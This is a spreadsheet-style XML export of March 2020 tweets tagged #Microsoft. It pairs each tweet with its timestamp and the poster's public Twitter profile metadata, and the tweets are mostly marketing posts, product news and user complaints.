    <t>Microsoft, IBM and the Roman Catholic Church have joined forces to design the 'human-centred' AI: https://t.co/uTASMoAP6y
#Microsoft #IBM #AI #RomanCatholicChurch #design #humancentredAI https://t.co/JjuHEcWcZZ</t>
  </si>
  <si>
    <t>{'id': 263434698, 'id_str': '263434698', 'name': 'Janice Grant Shaw', 'screen_name': 'janicegrantshaw', 'location': 'Aberdeen', 'description': 'Founder @cconnecting.  Connecting #Tech #startup  #digital  I love #Italy #Reiki #yoga #data #scotland https://t.co/axSqIatKH0', 'url': 'https://t.co/kEAkaqbDvx', 'entities': {'url': {'urls': [{'url': 'https://t.co/kEAkaqbDvx', 'expanded_url': 'http://www.companyconnecting.com', 'display_url': 'companyconnecting.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/axSqIatKH0', 'expanded_url': 'https://www.facebook.com/companyconnecting/', 'display_url': 'facebook.com/companyconnectâ€¦', 'indices': [103, 126]}]}}, 'protected': False, 'followers_count': 4682, 'friends_count': 4700, 'listed_count': 145, 'created_at': 'Thu Mar 10 01:28:48 +0000 2011', 'favourites_count': 3393, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9114,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'http://pbs.twimg.com/profile_images/2936378787/e8c87784e749ac04d137bbdca24c6a3f_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2936378787/e8c87784e749ac04d137bbdca24c6a3f_normal.jpeg',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</si>
  <si>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11:29:11 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft bad server and bad service and response and bad edge and chrome and browsing and browser's and internet and wifi and connection and google and youtube and twitter and facebook and app's and performance and bad feedback and bad java and explorer and scrolling</t>
  </si>
  <si>
    <t>Mon Mar 02 11:25:40 +0000 2020</t>
  </si>
  <si>
    <t>Hello Corporate.......
Looking for IT training.......?
Want to know more........?
kindly go through  https://t.co/9jERDDW6YK
#Corporatetraining #onlinetraining #Businessintelligence #softwaretesting #artificialintelligence #AI #BPM #Liferay #Alfresco #nutanix #microsoft https://t.co/RXCY5mRQXw</t>
  </si>
  <si>
    <t>{'id': 113927439, 'id_str': '113927439', 'name': 'Attune World Wide', 'screen_name': 'attuneww', 'location': 'India', 'description': 'Web Portal Development | Java Development | Open Source Solution | Cloud Solutions | Liferay | Alfresco | Hire Dedicated Developers', 'url': 'http://t.co/VTU3JAHJ6f', 'entities': {'url': {'urls': [{'url': 'http://t.co/VTU3JAHJ6f', 'expanded_url': 'http://www.attuneww.com', 'display_url': 'attuneww.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2228, 'friends_count': 4512, 'listed_count': 84, 'created_at': 'Sat Feb 13 14:01:48 +0000 2010', 'favourites_count': 4125, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2278, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '4D5959', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1103210775026397185/Abp507s6_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1103210775026397185/Abp507s6_normal.png', 'profile_link_color': 'FF7200', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'DDEEF6', 'profile_text_color': '0084B4', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 11:22:27 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft internet explorer and java bad so much and have issues</t>
  </si>
  <si>
    <t>Mon Mar 02 11:17:54 +0000 2020</t>
  </si>
  <si>
    <t>Taashee Linux Services unleashes v2020 website to serve customers with open source technologies for Data Backup, Data Migration, Cloud Computing, and more.
Learn More : https://t.co/HV2YoPcS93
#cloud #website #cloudcomputing #databackup #customers #microsoft #data #taashee https://t.co/exQNyRnUW9</t>
  </si>
  <si>
    <t>{'id': 1201813292643078145, 'id_str': '1201813292643078145', 'name': 'Taashee Training', 'screen_name': 'TaasheeTraining', 'location': 'Bengaluru', 'description': 'Get trained on PostgreSQL from certified Trainers.', 'url': 'https://t.co/SJbal3Ia6W', 'entities': {'url': {'urls': [{'url': 'https://t.co/SJbal3Ia6W', 'expanded_url': 'http://training.taashee.com/', 'display_url': 'training.taashee.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 53, 'listed_count': 0, 'created_at': 'Tue Dec 03 10:40:14 +0000 2019', 'favourites_count': 0,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'http://pbs.twimg.com/profile_images/1203998901126090752/OLTdxmdq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1203998901126090752/OLTdxmdq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1201813292643078145/1575612223',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</si>
  <si>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11:17:10 +0000 2020</t>
  </si>
  <si>
    <t>For #Microsoft (@Microsoft) CEO #SatyaNadella (@satyanadella), coding is like poetry and now, researchers have revealed that one does not need to be even good at math to become a good coder at any of the #Siliconvalley tech giant like #Apple (@Apple).
Photo: IANS https://t.co/1JTMRDcval</t>
  </si>
  <si>
    <t>Mon Mar 02 11:15:51 +0000 2020</t>
  </si>
  <si>
    <t>As #PowerBI specialists, were delighted to see #Gartner recognising #Microsoft as a Magic Quadrant leader in analytics and business intelligence platforms for the 13th consecutive year https://t.co/7Vfk435Diy</t>
  </si>
  <si>
    <t>{'id': 155919134, 'id_str': '155919134', 'name': 'change++ Ltd', 'screen_name': 'changepp', 'location': 'Newbury, Berkshire', 'description': 'leaders in performance management systems which drive growth &amp; sustain profitability', 'url': 'https://t.co/itJMLI9HRs', 'entities': {'url': {'urls': [{'url': 'https://t.co/itJMLI9HRs', 'expanded_url': 'http://www.changepp.co.uk', 'display_url': 'changepp.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 41, 'friends_count': 106, 'listed_count': 1, 'created_at': 'Tue Jun 15 14:15:23 +0000 2010', 'favourites_count': 9, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/992401756/chtwitter_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/992401756/chtwitter_normal.jpg',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</si>
  <si>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11:14:37 +0000 2020</t>
  </si>
  <si>
    <t>@OASystemsLtd and @SolgariConverse announce strategic partnership in New Zealand.
https://t.co/p9mVbgJFdr
#OASystems #Solgari #Business #Microsoft #Innovation #Partnership #ISV #Msdyn365 https://t.co/cCAuKjyHcJ</t>
  </si>
  <si>
    <t>Mon Mar 02 11:14:11 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft edge and windows and app and connection and wifi and internet and browsing and browser's and performance and update and store bad and stopped and lag and bad so much and slow and bad scrolling and bad internet and browsing so much and bad feedback</t>
  </si>
  <si>
    <t>Mon Mar 02 11:13:32 +0000 2020</t>
  </si>
  <si>
    <t>Taashee Linux Services unleashes v2020 website to serve customers with open source technologies for Data Backup, Data Migration, Cloud Computing, and more.
Learn More : https://t.co/bDHWuHOu77
#cloud #website #cloudcomputing #databackup #customers #microsoft  #data #taashee https://t.co/aPhjEpJP3h</t>
  </si>
  <si>
    <t>{'id': 743052108618833922, 'id_str': '743052108618833922', 'name': 'Taashee Linux Services', 'screen_name': 'TaasheeServices', 'location': 'Hyderabad', 'description': 'Taashee Linux Services provides solutions and services spanning a wide range of technologies and platforms.', 'url': 'https://t.co/RZayVZQ1J6', 'entities': {'url': {'urls': [{'url': 'https://t.co/RZayVZQ1J6', 'expanded_url': 'https://www.taashee.com/', 'display_url': 'taashee.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 12, 'friends_count': 57, 'listed_count': 11, 'created_at': 'Wed Jun 15 12:06:42 +0000 2016', 'favourites_count': 4, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 114, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1202193145900855297/AS_rJ2Ui_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1202193145900855297/AS_rJ2Ui_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/743052108618833922/1575460158',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</si>
  <si>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11:12:02 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/9H7h2tqVQl
#Microsoft Teams delivers #efficiency and #productivity to improve #collaboration across organisations. Read how it can benefit you and your processes.
#MicrosoftTeams #Technology #Office365 #MSInnovation https://t.co/957yA2GySu</t>
  </si>
  <si>
    <t>{'id': 861512810, 'id_str': '861512810', 'name': 'Agilisys', 'screen_name': 'Agilisys', 'location': '', 'description': 'We make digital perform for the public sector, public services, healthcare, local government, citizens, and you.', 'url': 'https://t.co/L8voXDDRnc', 'entities': {'url': {'urls': [{'url': 'https://t.co/L8voXDDRnc', 'expanded_url': 'http://www.agilisys.co.uk', 'display_url': 'agilisys.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2757, 'friends_count': 2449, 'listed_count': 189, 'created_at': 'Thu Oct 04 14:44:10 +0000 2012', 'favourites_count': 3482, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5633, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '3D484E', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1214576204176605184/oQhwQEgL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1214576204176605184/oQhwQEgL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/861512810/1578277507', 'profile_link_color': '9D6BE7',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</si>
  <si>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Mon Mar 02 11:11:49 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft edge and windows and app and connection and wifi and internet and browsing and browser's and performance and update and store bad and stopped and lag and bad so much and slow and bad scrolling and bad internet and browsing so much</t>
  </si>
  <si>
    <t>Mon Mar 02 11:11:34 +0000 2020</t>
  </si>
  <si>
    <t>Public preview of Azure AD support for FIDO2 security keys in hybrid environments 
More Information: https://t.co/HbjGftj60l
#it #security #azure #azuread #microsoft https://t.co/tZZwJD0Bka</t>
  </si>
  <si>
    <t>{'id': 116035583, 'id_str': '116035583', 'name': 'Oxford Computer Group', 'screen_name': 'ocggmbh', 'location': 'Erding, Deutschland', 'description': 'Ihre Experten fÃ¼r Identity Management &amp; Security.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 30, 'friends_count': 105, 'listed_count': 0, 'created_at': 'Sat Feb 20 22:37:01 +0000 2010', 'favourites_count': 24, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1074619383144689664/tzhBhbem_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1074619383144689664/tzhBhbem_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/116035583/1575364096',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</si>
  <si>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11:10:23 +0000 2020</t>
  </si>
  <si>
    <t>By the way, the only Microsoft documentation I have found less-boring so far is that of Azure DevOps =&amp;gt; https://t.co/ZiEiEyMsOE
Or maybe I am just a little patient this time.
#Microsoft #Azure #DevOps</t>
  </si>
  <si>
    <t>Mon Mar 02 11:09:24 +0000 2020</t>
  </si>
  <si>
    <t>Finally, I Am Now A #Microsoft Certified Trainer (MCT)
After some headless-chicken-run type of exercise for the last two weeks, I finally got into the Microsoft Certified Trainer program. I am now an official Microsoft Certified Trainer. I am doing well! 
@msexcel @MSPowerBI https://t.co/8ggjiedEIh</t>
  </si>
  <si>
    <t>{'id': 1091706374441062400, 'id_str': '1091706374441062400', 'name': 'Adewale Yusuf', 'screen_name': 'Adewaleanalyst', 'location': 'Lagos, Nigeria', 'description': 'Power Platform Specialist\n\n|Power BI | DAX | PowerQuery | Excel | PowerApps', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 107, 'friends_count': 286, 'listed_count': 0, 'created_at': 'Sat Feb 02 14:34:17 +0000 2019', 'favourites_count': 132, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 106, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1194624281860169731/w7qgmVxH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1194624281860169731/w7qgmVxH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1091706374441062400/1581889329',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</si>
  <si>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11:04:15 +0000 2020</t>
  </si>
  <si>
    <t>"Arby and the Cheif"
#Halo #343 #Microsoft #xbox https://t.co/4Nipi7NBQz</t>
  </si>
  <si>
    <t>{'id': 1234425701182451712, 'id_str': '1234425701182451712', 'name': 'JWR Productions', 'screen_name': 'JamesWe75125656', 'location': 'Florida, USA', 'description': 'James Welch,\nArtist\nFind me on Instagram @jwr_productions', 'url': 'https://t.co/lJH0o8iEnx', 'entities': {'url': {'urls': [{'url': 'https://t.co/lJH0o8iEnx', 'expanded_url': 'https://www.artstation.com/wolf_raider', 'display_url': 'artstation.com/wolf_raider', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Mon Mar 02 10:30:10 +0000 2020', 'favourites_count': 0,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'http://pbs.twimg.com/profile_images/1234425948273070081/5BYUaKcz_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234425948273070081/5BYUaKcz_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234425701182451712/1583145256',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</si>
  <si>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11:03:44 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Weekly: Xbox's new Home, a peek at Surface Duo, and new builds for everyone #MicrosoftWeekly #Microsoft: https://t.co/yJbiGLfSP3 via @NeowinFeed</t>
  </si>
  <si>
    <t>Mon Mar 02 11:01:36 +0000 2020</t>
  </si>
  <si>
    <t>#RISEABOVE
 As a VUE Select Site you can take both technical and non-tech exams with us e.g. GMAT, CIMA, Nursery &amp;amp; Midwifery
Contact us at examinfo@itiq.co.bw
#Certification #VUE #Exams #Proctoring #Botswana #Microsoft #Cisco #CompTIA #Oracle #Peoplecert #Prince2 #ITIL https://t.co/IwnOYI3fpR</t>
  </si>
  <si>
    <t>{'id': 348917831, 'id_str': '348917831', 'name': 'IT-IQ Botswana', 'screen_name': 'ITIQBotswana', 'location': 'Gaborone, Botswana', 'description': 'Leading ICT company based in Botswana.', 'url': 'https://t.co/ETt2JSehgo', 'entities': {'url': {'urls': [{'url': 'https://t.co/ETt2JSehgo', 'expanded_url': 'http://www.itiq.co.bw', 'display_url': 'itiq.co.bw', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 693, 'friends_count': 178, 'listed_count': 5, 'created_at': 'Fri Aug 05 06:36:44 +0000 2011', 'favourites_count': 117, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1459,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'http://pbs.twimg.com/profile_images/940255648813477896/CPvzkP7e_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/940255648813477896/CPvzkP7e_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/348917831/1580141480',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</si>
  <si>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Mon Mar 02 11:01:34 +0000 2020</t>
  </si>
  <si>
    <t>Anxiety, Depression Can Be Eased with 150 Minutes of Exercise a Week
https://t.co/khOVHeF6pe
#sdoh #socialdeterminantsofhealth #gohealthhero #pophealth #health #wellbeing #valuebased #healthit #salesforce #cerner #epic #microsoft #Z55 #Z65 #mondaymotivation</t>
  </si>
  <si>
    <t>Mon Mar 02 11:00:42 +0000 2020</t>
  </si>
  <si>
    <t>Still running servers on-premises? Looking for a 212% ROI? It's time to move to #Microsoft #Azure. Forrester's financial impact study gives you more reasons to make a move. #cloudmigration https://t.co/CCZBpTdTpc</t>
  </si>
  <si>
    <t>{'id': 353809676, 'id_str': '353809676', 'name': 'i2e Consulting', 'screen_name': 'I2eC', 'location': 'USA', 'description': 'Microsoft Gold Certified Partner with niche in Portfolio Project Management, EPM Solutions for Pharmaceutical companies.', 'url': 'http://t.co/qDCvapUzvq', 'entities': {'url': {'urls': [{'url': 'http://t.co/qDCvapUzvq', 'expanded_url': 'http://www.i2econsulting.com/', 'display_url': 'i2econsulting.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 174, 'friends_count': 126, 'listed_count': 4, 'created_at': 'Fri Aug 12 17:30:39 +0000 2011', 'favourites_count': 24, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 801,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'http://pbs.twimg.com/profile_images/1156480757319127041/HdsEe1CC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1156480757319127041/HdsEe1CC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/353809676/1497339246',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</si>
  <si>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11:00:27 +0000 2020</t>
  </si>
  <si>
    <t>For a quick summary of some of the recent IT news you might not have heard about, check out our latest edition of #NouveauBullITen - the bulletin with a focus on IT  https://t.co/1ciU8zI9av
#news #readin2minutes #ITupdate #security #cloud #microsoft #cyber https://t.co/GjabJZOYYK</t>
  </si>
  <si>
    <t>{'id': 40842852, 'id_str': '40842852', 'name': 'Nouveau IT Solutions', 'screen_name': 'nouveausolution', 'location': 'Wokingham, Berkshire', 'description': 'ðŸ–¥ï¸ Professional IT Solutions since 1992.\n\nâ­ #ManagedServices #Cloud #Infrastructure #Networking #Software #Security ðŸ›¡ï¸\n\nðŸ“§ hello@nouveau.co.uk\nâ˜Ž 0118 9186 822', 'url': 'https://t.co/288hEC9oBr', 'entities': {'url': {'urls': [{'url': 'https://t.co/288hEC9oBr', 'expanded_url': 'http://www.nouveau.co.uk/contact/', 'display_url': 'nouveau.co.uk/contact/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 837, 'friends_count': 1168, 'listed_count': 27, 'created_at': 'Mon May 18 09:16:35 +0000 2009', 'favourites_count': 413, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2475,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'http://pbs.twimg.com/profile_images/1222481383634939904/Jc7oAwCR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1222481383634939904/Jc7oAwCR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/40842852/1580297082', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'DDFFCC', 'profile_text_color': '14151A', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 11:00:20 +0000 2020</t>
  </si>
  <si>
    <t>There are only 3 days to go until our first #Microsoft technology update of 2020.
Register below and find out the latest features and functionality- and even developments that are still in preview.
https://t.co/xzZD1GwDAh</t>
  </si>
  <si>
    <t>Mon Mar 02 11:00:19 +0000 2020</t>
  </si>
  <si>
    <t>Have you still got #Windows7? 
Did you know in January #Microsoft ended support for Windows 7, which means security updates and fixes will no longer be available.
Therefore if you use #OnlineBanking on a Windows 7 machine you could be prone to viruses and #hacking. https://t.co/u5cH1VKuh4</t>
  </si>
  <si>
    <t>{'id': 308620905, 'id_str': '308620905', 'name': 'Affinity IT', 'screen_name': 'Affinity_IT', 'location': 'Sheffield', 'description': "Affinity IT Services deliver unrivalled quality of service and unparalleled integrity, enabling our clients' to operate to their full potential. 0114 362 7000", 'url': 'https://t.co/YDhkgPyYpV', 'entities': {'url': {'urls': [{'url': 'https://t.co/YDhkgPyYpV', 'expanded_url': 'http://www.affinityit.co.uk', 'display_url': 'affinityit.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 508, 'friends_count': 1075, 'listed_count': 10, 'created_at': 'Tue May 31 18:26:44 +0000 2011', 'favourites_count': 226, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1006,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'http://pbs.twimg.com/profile_images/1229690673055567872/6l3jWLNf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1229690673055567872/6l3jWLNf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/308620905/1581957369', 'profile_link_color': '9E9C9E',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</si>
  <si>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11:00:15 +0000 2020</t>
  </si>
  <si>
    <t>In their latest venture, Manchester United's class of 92' have teamed up with #Microsoft to build and deliver a computer science curricula at the new #UA92   
Watch here for the launch of the new office making all this possible: https://t.co/xXi3SQUCZS</t>
  </si>
  <si>
    <t>Mon Mar 02 11:00:09 +0000 2020</t>
  </si>
  <si>
    <t>Did you know that Outlook now supports Split View on iPads? https://t.co/EU64uVponP
#Apple #iOS #iOS13 #iPad #Microsoft #Outlook #iPadOS via @iMore</t>
  </si>
  <si>
    <t>{'id': 278687312, 'id_str': '278687312', 'name': 'Damien Schreurs', 'screen_name': 'DamienSchreurs', 'location': 'Luxembourg', 'description': 'Freelance Apple Tutor &amp; Consultant | Host of the @Macpreneurfm podcast | Certified Apple Support Professional | Digital tinker | Husband &amp; father of 2', 'url': 'https://t.co/5N8fngh7JP', 'entities': {'url': {'urls': [{'url': 'https://t.co/5N8fngh7JP', 'expanded_url': 'http://www.linkedin.com/in/dschreurs', 'display_url': 'linkedin.com/in/dschreurs', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 181, 'friends_count': 156, 'listed_count': 12, 'created_at': 'Thu Apr 07 19:28:27 +0000 2011', 'favourites_count': 34, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3999,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'http://pbs.twimg.com/profile_images/826229367168704512/Zc6t4-pR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/826229367168704512/Zc6t4-pR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/278687312/1469887815',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</si>
  <si>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Mon Mar 02 10:59:37 +0000 2020</t>
  </si>
  <si>
    <t>Trusted Security support for #Microsoft one stop to experts for guaranteed solutions.
Toll-free Phone Number -+1800-975-164
#Microsoftwindows #Microsofthelpline #TechSupport
For more info:
visit us: https://t.co/8XYiNmvbC4 https://t.co/KISZ67a9va</t>
  </si>
  <si>
    <t>{'id': 1046634479077404673, 'id_str': '1046634479077404673', 'name': 'Citscape', 'screen_name': 'Citscape1', 'location': 'Australia', 'description': '', 'url': 'https://t.co/CEYOvqrePy', 'entities': {'url': {'urls': [{'url': 'https://t.co/CEYOvqrePy', 'expanded_url': 'https://citscape.com/', 'display_url': 'citscape.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 12, 'listed_count': 0, 'created_at': 'Mon Oct 01 05:34:40 +0000 2018', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 228, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1046733750837465089/k_2LsqN1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1046733750837465089/k_2LsqN1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1046634479077404673/1580557024',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</si>
  <si>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10:50:26 +0000 2020</t>
  </si>
  <si>
    <t>SQL Server runs best on Azure. Heres why. | Azure Blog and Updates | Microsoft Azure https://t.co/jSzlbkygJ5 #microsoft</t>
  </si>
  <si>
    <t>{'id': 91405281, 'id_str': '91405281', 'name': 'Dr. Victoria Holt', 'screen_name': 'victoria_holt', 'location': 'Bath, UK', 'description': 'Data Architect. Passionately curious about Data, Databases &amp; Systems Complexity. Database Systems. Honorary Research Fellow. Microsoft #DataPlatform #MVP', 'url': 'https://t.co/PlpdRSkE9y', 'entities': {'url': {'urls': [{'url': 'https://t.co/PlpdRSkE9y', 'expanded_url': 'http://blog.victoriaholt.co.uk/', 'display_url': 'blog.victoriaholt.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1389, 'friends_count': 1288, 'listed_count': 282, 'created_at': 'Fri Nov 20 19:15:11 +0000 2009', 'favourites_count': 5792, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 15862,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'http://pbs.twimg.com/profile_images/1113880661306281986/p32lamJP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1113880661306281986/p32lamJP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/91405281/1399490643',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</si>
  <si>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Mon Mar 02 10:50:07 +0000 2020</t>
  </si>
  <si>
    <t>Malaysians are 4th more civil online globally. I wonder if this will change with the ongoing political drama in the country  #Microsoft #2020DigitalCivilityIndex
https://t.co/vYvpRLdhjc</t>
  </si>
  <si>
    <t>{'id': 1588176764, 'id_str': '1588176764', 'name': 'vernonchandotcom', 'screen_name': 'vernonchancom', 'location': 'Malaysia', 'description': 'Consumer tech. Mobile. Gadgets. Gaming. Enterprise tech. Reviews. Features. News. Lifestyle. Created by @vernieman', 'url': 'https://t.co/2E74fvCqj2', 'entities': {'url': {'urls': [{'url': 'https://t.co/2E74fvCqj2', 'expanded_url': 'http://vernonchan.com', 'display_url': 'vernonchan.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1043, 'friends_count': 754, 'listed_count': 65, 'created_at': 'Fri Jul 12 10:34:18 +0000 2013', 'favourites_count': 2088, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8591,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'http://pbs.twimg.com/profile_images/982996779468648450/LAY2Zvdu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/982996779468648450/LAY2Zvdu_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1588176764/1527964160', 'profile_link_color': '065DC7',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</si>
  <si>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10:49:58 +0000 2020</t>
  </si>
  <si>
    <t>@gamesyouloved We sure did!!! #Xbox #Microsoft https://t.co/5l2Y8kUPAy</t>
  </si>
  <si>
    <t>{'id': 303448869, 'id_str': '303448869', 'name': 'Retro_Nerd', 'screen_name': 'Retro_Nerdist', 'location': 'United Kingdom', 'description': 'All about movies, TV shows, gaming, sports and tech. \nProviding all the latest news and updates and theories as they happen.', 'url': 'https://t.co/gvBpeHS4vb', 'entities': {'url': {'urls': [{'url': 'https://t.co/gvBpeHS4vb', 'expanded_url': 'https://www.instagram.com/retro_nerdist/', 'display_url': 'instagram.com/retro_nerdist/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 127, 'friends_count': 365, 'listed_count': 3, 'created_at': 'Sun May 22 21:55:32 +0000 2011', 'favourites_count': 146, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7935,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'http://pbs.twimg.com/profile_images/1122568064783011840/3plZDUjm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1122568064783011840/3plZDUjm_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/303448869/1565897900', 'profile_link_color': '1B95E0',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</si>
  <si>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Mon Mar 02 10:47:18 +0000 2020</t>
  </si>
  <si>
    <t>Xbox Update &amp;amp; KINGDOM HEARTS Interview | This Week on Xbox
https://t.co/zOQXZP3qxp #ThisWeekOnXbox #GamesWithGold #GamePass #XboxLive #XboxOneX #XboxOne #Xbox #Microsoft #deadarticgames</t>
  </si>
  <si>
    <t>{'id': 4354197195, 'id_str': '4354197195', 'name': 'DeadArtic Gamesâ„¢', 'screen_name': 'DeadarticGames', 'location': '', 'description': 'ðŸŽ® Videogames website ðŸŽ®                 https://t.co/zydyAFZWQu \nhttps://t.co/oh3t8Z3kww  \n                âœ‰contacto@deadarticgames.com', 'url': 'https://t.co/WC1z24Duj2', 'entities': {'url': {'urls': [{'url': 'https://t.co/WC1z24Duj2', 'expanded_url': 'http://www.deadarticgames.com', 'display_url': 'deadarticgames.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/zydyAFZWQu', 'expanded_url': 'http://instagram.com/deadarticgames/', 'display_url': 'instagram.com/deadarticgames/', 'indices': [39, 62]}, {'url': 'https://t.co/oh3t8Z3kww', 'expanded_url': 'http://facebook.com/deadarticgames/', 'display_url': 'facebook.com/deadarticgames/', 'indices': [64, 87]}]}}, 'protected': False, 'followers_count': 4341, 'friends_count': 2926, 'listed_count': 34, 'created_at': 'Wed Dec 02 20:52:55 +0000 2015', 'favourites_count': 171, 'utc_offset': None, 'time_zone': None, 